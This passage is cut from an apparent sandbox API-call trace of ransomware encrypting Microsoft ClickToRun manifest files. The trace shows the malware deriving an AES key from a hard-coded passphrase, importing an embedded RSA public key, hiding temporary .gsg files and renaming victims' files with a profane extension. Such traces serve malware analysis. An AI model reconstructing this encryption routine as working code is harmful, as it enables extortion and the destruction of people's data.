dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.150] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.150] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.151] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28aa9e0) returned 1 [0239.153] CryptCreateHash (in: hProv=0x28aa9e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.153] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.153] CryptHashData (hHash=0x2893af0, pbData=0x2884b48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.153] CryptDeriveKey (in: hProv=0x28aa9e0, Algid=0x6610, hBaseData=0x2893af0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.153] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.153] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.153] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28aa6b0) returned 1 [0239.154] CryptImportPublicKeyInfo (in: hCryptProv=0x28aa6b0, dwCertEncodingType=0x1, pInfo=0x28972a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28972d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28972d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2893f70) returned 1 [0239.154] CryptEncrypt (in: hKey=0x2893f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.154] CryptEncrypt (in: hKey=0x2893f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aac00*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28aac00*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.154] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28aac00, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.154] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.154] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.154] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.154] CloseHandle (hObject=0xffffffff) returned 1 [0239.154] CloseHandle (hObject=0xffffffff) returned 1 [0239.154] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.155] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.155] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml.gsg")) returned 0 [0239.155] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml.fuck")) returned 0 [0239.156] CryptDestroyHash (hHash=0x2893af0) returned 1 [0239.156] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.156] CryptReleaseContext (hProv=0x28aa9e0, dwFlags=0x0) returned 1 [0239.156] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.156] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.156] GetLastError () returned 0x5 [0239.156] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml")) returned 0x20 [0239.156] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.157] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.157] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.157] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.158] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28aa738) returned 1 [0239.159] CryptCreateHash (in: hProv=0x28aa738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.159] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.160] CryptHashData (hHash=0x2893b70, pbData=0x2884c88, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.160] CryptDeriveKey (in: hProv=0x28aa738, Algid=0x6610, hBaseData=0x2893b70, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893fb0) returned 1 [0239.160] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.160] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.160] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28aad10) returned 1 [0239.160] CryptImportPublicKeyInfo (in: hCryptProv=0x28aad10, dwCertEncodingType=0x1, pInfo=0x2896a80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896ab0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896ab8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894870) returned 1 [0239.160] CryptEncrypt (in: hKey=0x2894870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.160] CryptEncrypt (in: hKey=0x2894870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aad98*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28aad98*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.160] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28aad98, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.160] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.160] CryptEncrypt (in: hKey=0x2893fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.160] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.161] CloseHandle (hObject=0xffffffff) returned 1 [0239.161] CloseHandle (hObject=0xffffffff) returned 1 [0239.161] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.161] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.161] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.162] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.162] CryptDestroyHash (hHash=0x2893b70) returned 1 [0239.162] CryptDestroyKey (hKey=0x2893fb0) returned 1 [0239.162] CryptReleaseContext (hProv=0x28aa738, dwFlags=0x0) returned 1 [0239.162] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.162] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.164] GetLastError () returned 0x5 [0239.164] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml")) returned 0x20 [0239.164] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.165] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.165] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.166] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.166] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28aa490) returned 1 [0239.168] CryptCreateHash (in: hProv=0x28aa490, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.168] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.168] CryptHashData (hHash=0x2893fb0, pbData=0x2884ad0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.168] CryptDeriveKey (in: hProv=0x28aa490, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.168] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.168] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.168] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28aaf30) returned 1 [0239.169] CryptImportPublicKeyInfo (in: hCryptProv=0x28aaf30, dwCertEncodingType=0x1, pInfo=0x2897370*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28973a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28973a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894530) returned 1 [0239.169] CryptEncrypt (in: hKey=0x2894530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.169] CryptEncrypt (in: hKey=0x2894530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28aac88*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28aac88*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.169] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28aac88, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.169] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.169] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.169] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.169] CloseHandle (hObject=0xffffffff) returned 1 [0239.169] CloseHandle (hObject=0xffffffff) returned 1 [0239.169] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.170] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.170] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml.gsg")) returned 0 [0239.170] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml.fuck")) returned 0 [0239.171] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.171] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.171] CryptReleaseContext (hProv=0x28aa490, dwFlags=0x0) returned 1 [0239.171] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.171] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.171] GetLastError () returned 0x5 [0239.171] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml")) returned 0x20 [0239.171] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.172] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.172] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.172] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.173] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28aaa68) returned 1 [0239.175] CryptCreateHash (in: hProv=0x28aaa68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.175] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.175] CryptHashData (hHash=0x2893fb0, pbData=0x2884c10, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.175] CryptDeriveKey (in: hProv=0x28aaa68, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893af0) returned 1 [0239.175] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 